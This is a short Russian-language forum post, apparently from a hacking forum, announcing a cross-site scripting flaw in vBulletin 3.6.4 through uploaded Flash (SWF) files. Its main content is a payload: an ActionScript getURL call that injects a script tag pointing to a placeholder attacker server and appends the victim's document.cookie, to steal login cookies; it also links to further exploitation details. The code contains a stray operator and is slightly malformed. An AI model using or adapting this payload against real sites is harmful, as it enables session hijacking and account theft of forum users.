
27.12.2006, 09:03
|
|
Новичок
Регистрация: 21.11.2006
Сообщений: 29
Провел на форуме: 90591
Репутация:
33
|
|
VBulletin 3.6.4 [FLASH] (SWF) XSS
VBulletin 3.6.4
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных при обработке входящих запросов. Атакующий может выполнить SWF произвольный сценарий и выкрасть данные аутентификации cookie.
Пример:
Код:
getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
Информация по эксплуатации уязвимости описана ниже
http://forum.antichat.ru/showpost.php?p=558935&postcount=28
Последний раз редактировалось Elekt; 03.09.2008 в 03:05..
|
|
|